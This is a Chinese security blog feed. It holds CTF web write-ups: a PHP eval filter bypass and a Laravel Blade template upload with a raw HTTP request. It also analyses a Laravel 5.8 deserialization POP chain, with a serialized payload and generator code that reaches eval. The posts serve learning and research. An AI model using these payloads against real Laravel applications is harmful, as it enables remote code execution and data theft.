Laravel – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Thu, 12 Sep 2019 02:33:20 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 广东强网杯两道Web Writeup /ctf/956.html /ctf/956.html#comments Thu, 12 Sep 2019 02:30:43 +0000 /?p=956 @level5师傅发在群里的题目,做了两道

web4 php

http://119.61.19.212:8082/index.php

error_reporting(E_ALL^E_NOTICE^E_WARNING);
function GetYourFlag(){
    echo file_get_contents("./flag.php");
}

if(isset($_GET['code'])){
    $code = $_GET['code'];
    //print(strlen($code));
    if(strlen($code)>27){ 
        die("Too Long.");
    }

    if(preg_match('/[a-zA-Z0-9_&^<>"']+/',$_GET['code'])) {
        die("Not Allowed.");
    }
    @eval($_GET['code']);
}else{
      highlight_file(__FILE__);
}

过滤字符数字下划线等等 长度小于等于27 然后调用GetYourFlag()函数即可,可以用~按位取反

echo urlencode(~('GetYourFlag'));

得到

%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98

然后函数需要再取反回来

~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)

存到一个变量里,因为过滤,我们用中文来定义变量,我在这用

echo urlencode('中');    //%E4%B8%AD

然后用变量存储我们取反回来的GetYourFlag函数,最后通过变量来调用这个函数

$%E4%B8%AD=~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98);$%E4%B8%AD();

最后的payload

view-source:http://119.61.19.212:8082/index.php?code=$%E4%B8%AD=~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98);$%E4%B8%AD();

web5

laravel的代码审计

路由

20190912093854

app/Http/Controllers/UserController.php 注入

20190912093943

20190912094106

密码解不出来,但是在database/factories/UserFactory.php这个工厂函数中给出来了

20190912095222

继续看 app/Http/Controllers/HomeController.php

20190912094237

登录后要从数据库中拿到key,然后才能上传文件,也就是进入HomeController@uploadss。传文件的文件名经过一层filecheck()过滤之后移动到视图模板的目录里,清晰了,通过上传覆盖原本的模板然后模板注入读flag。

20190912094545

正好/resources/views/auth/uploads/目录有一个template.blade.php模板,而路由中也有控制器去渲染这个模板。

20190912094749

20190912094834

构造表单上传之后发现上传filecheck()过滤了很多东西,不能有php <字样。

首先我们要知道laravel的blade模板是可以自定义php代码的,但是必须是如下格式

@php
    //
@endphp

但是过滤了php关键字,没办法,只能去扒一扒blade的文档了,然后发现了自定义模板标签 https://laravel.com/docs/5.8/blade#extending-blade

20190912095812

牛逼,直接@filedata(‘/flag’)就完事了。

POST /home/uploadss/NotAllow6171 HTTP/1.1
Host: 119.61.19.212:8085
Content-Length: 444
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvJNe9ABsnjeKGhDN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IitoWjhwMm1ycmNTWFozSmZTTXJwXC9nPT0iLCJ2YWx1ZSI6IkllczhnNEZodldZbllTN0NmZDErR2I1eXF1bU9mV1wvYklManNuUnQ4YzhJcmlWQ09JVXJPXC9JNHZxVU0xRmdCY0RDbWJHelVwYjQyVjdXQ1FHVlFMMlE9PSIsIm1hYyI6IjNmMGUzZTEwYTA2ZDA2MjJjMDg4OTY5NTI4NDJjNTk2YmQ4N2U4NWYxY2E2ZjU3YWEwNTAwODllMzIyYTU4ZjAifQ%3D%3D; laravel_session=eyJpdiI6InRhRzZmenBJSmFLNHhrb0RlUE5OdVE9PSIsInZhbHVlIjoiZ01qK2JpQURoRHgxbFVrcGc4TE9PK2kycGxSTjlNRzkwK21uVDUxa3UyTW5JYXpIcWJaY2pYbXQwNDc0dklkemNjRmR0aFhZcllmTkRvQXpVUlR3d3c9PSIsIm1hYyI6IjAwMjVkODA3YmY5NDU1Y2U5MDMyMWMwMTI1MTcyMmQ1YTU5NWQzMTE0MGMxMzc0ZWM1NDU4YzQ5MWIyZjI5YTgifQ%3D%3D
Connection: close

------WebKitFormBoundaryvJNe9ABsnjeKGhDN
Content-Disposition: form-data; name="_token"

Z7VZ7FXfNzuzETtQrZ7DeAZCFtbkQl9L8e7ptVin
------WebKitFormBoundaryvJNe9ABsnjeKGhDN
Content-Disposition: form-data; name="files"; filename="template.blade.php"
Content-Type: text/html

@filedata('/flag')
------WebKitFormBoundaryvJNe9ABsnjeKGhDN

Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryvJNe9ABsnjeKGhDN--

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。

]]> /ctf/956.html/feed 1 Laravel v5.8.x Pop Chain /audit/843.html Thu, 22 Aug 2019 07:47:06 +0000 /?p=843 在@mochazz师傅的博客里看到了Laravel的反序列化pop链,记录一下。

环境准备

  1. phpstudy
  2. php7.2.10
  3. phpstorm
  4. composer

搭建环境

配置composer

下载composer.phar 放到php的目录下面,给php配置好环境变量。

composer.phar 同级目录下新建文件 composer.bat

D:phpStudyPHPTutorialphpphp-7.2.1-nts> echo @php "%~dp0composer.phar" %*>composer.bat

关闭当前的命令行窗口,打开新的命令行窗口进行测试:

C:UsersY4er>composer -V
Composer version 1.9.0 2019-08-02 20:55:32

更换国内阿里源

composer config -g repo.packagist composer https://mirrors.aliyun.com/composer/

配置项目

创建laravel项目,注意选择版本

20190822140805

创建Demo控制器

E:codephplaravel58>php artisan make:controller DemoController
Controller created successfully.

配置路由

routes/web.php

<?php
use AppHttpControllersDemoController;

Route::get("/", "DemoController@demo");

添加 DemoController 控制器的demo方法,代码如下:

20190822142029

<?php

namespace AppHttpControllers;

class DemoController extends Controller
{
    public function demo()
    {
        if (isset($_GET['c'])) {
            $code = $_GET['c'];
            unserialize($code);
        } else {
            highlight_file(__FILE__);
        }
        return "Welcome to laravel5.8";
    }
}

pop链分析

首先我们要知道 laravel 在反序列化unserialize($code)时,如果反序列化对象的类不存在,会尝试去自动加载这个类。

堆栈如下

ClassLoader.php:444, ComposerAutoloadincludeFile()    //加载完之后包含类
ClassLoader.php:322, ComposerAutoloadClassLoader->loadClass() //加载类
DemoController.php:11, spl_autoload_call()  //对象类不存在 调用自动加载
DemoController.php:11, unserialize()        //反序列化传递过来的参数
DemoController.php:11, AppHttpControllersDemoController->demo()  //路由进入控制器

接着我们来看下整条pop链,@mochazz师傅的payload

http://php.local/?c=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22Mockery%5CLoader%5CEvalLoader%22%3A0%3A%7B%7Di%3A1%3Bs%3A4%3A%22load%22%3B%7D%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3BO%3A32%3A%22Mockery%5CGenerator%5CMockDefinition%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00config%22%3BO%3A37%3A%22PhpParser%5CNode%5CScalar%5CMagicConst%5CLine%22%3A0%3A%7B%7Ds%3A7%3A%22%00%2A%00code%22%3Bs%3A18%3A%22%3C%3Fphp+phpinfo%28%29%3B%3F%3E%22%3B%7D%7D%7D

用phpstorm打个断点来跟踪下。

整条pop链入口点利用的是类IlluminateBroadcastingPendingBroadcast__destruct方法。

20190822143707

$this->event设置为Dispatcher类,然后进入dispatch()函数

vendor/laravel/framework/src/Illuminate/Bus/Dispatcher.php

20190822145626

这里要满足if条件,看下$this->commandShouldBeQueued($command)

protected function commandShouldBeQueued($command)
{
    return $command instanceof ShouldQueue;
}

要$command实现ShouldQueue接口,找下

20190822150408

@mochazz师傅用的是IlluminateBroadcastingBroadcastEvent

然后进入$this->dispatchToQueue($command)

20190822145801

出现了call_user_func,这时候我们可以调用任意类的方法了,接下来寻找下可利用的类方法。

在类MockeryLoaderEvalLoaderload方法中有eval,并且参数可控。

20190822150655

但是要绕过前面的if语句块,也就是让class_exists($definition->getClassName(), false)返回false。

public function getClassName(){
    return $this->config->getName();
}

我们找一个含有getName方法且返回值可控的类,让其返回一个不存在的类名即可绕过if。

vendor/mockery/mockery/library/Mockery/Generator/MockConfiguration.php 这个类中有

public function getName()
{
    return $this->name;
}

最后进入到eval("?>" . $definition->getCode());

public function getCode()
{
    return $this->code;
}

getCode()依然可控,这个pop链就结束了。

构造exp

<?php

namespace IlluminateBroadcasting {
    class PendingBroadcast
    {
        protected $event;
        protected $events;

        public function __construct($events, $event)
        {
            $this->events = $events;
            $this->event = $event;
        }
    }
}

namespace IlluminateBus {
    class Dispatcher
    {
        protected $queueResolver;

        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
    }
}

namespace IlluminateBroadcasting {
    class BroadcastEvent
    {
        public $connection;

        public function __construct($connection)
        {
            $this->connection = $connection;
        }
    }
}


namespace MockeryGenerator {
    class MockDefinition
    {
        protected $config;
        protected $code = '<?php phpinfo();?>';

        public function __construct($config)
        {
            $this->config = $config;
        }
    }
}

namespace MockeryGenerator {
    class MockConfiguration
    {
        protected $name = '1234';
    }
}

namespace MockeryLoader {
    class EvalLoader
    {
        public function load(MockDefinition $definition)
        {

        }
    }
}

namespace {
    $Mockery = new MockeryLoaderEvalLoader();
    $queueResolver = array($Mockery, "load");
    $MockConfiguration = new MockeryGeneratorMockConfiguration();
    $MockDefinition = new MockeryGeneratorMockDefinition($MockConfiguration);
    $BroadcastEvent = new IlluminateBroadcastingBroadcastEvent($MockDefinition);
    $Dispatcher = new IlluminateBusDispatcher($queueResolver);
    $PendingBroadcast = new IlluminateBroadcastingPendingBroadcast($Dispatcher, $BroadcastEvent);
    echo urlencode(serialize($PendingBroadcast));
}
?>

参考链接

  1. Laravel5.8.x反序列化链
  2. Laravel mockery组件反序列化POP链分析

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。

]]> Laravel5.2开发博客实战项目视频教程 /course/522.html Thu, 09 Aug 2018 11:53:30 +0000 /?p=522 /

laravel5.2开发博客实战项目视频教程,跟着视频一步一步走,就能开发出来你自己的博客。 视频来自网络收集。

教程视频已经传到了B站,观看地址:https://www.bilibili.com/video/av28898626

]]>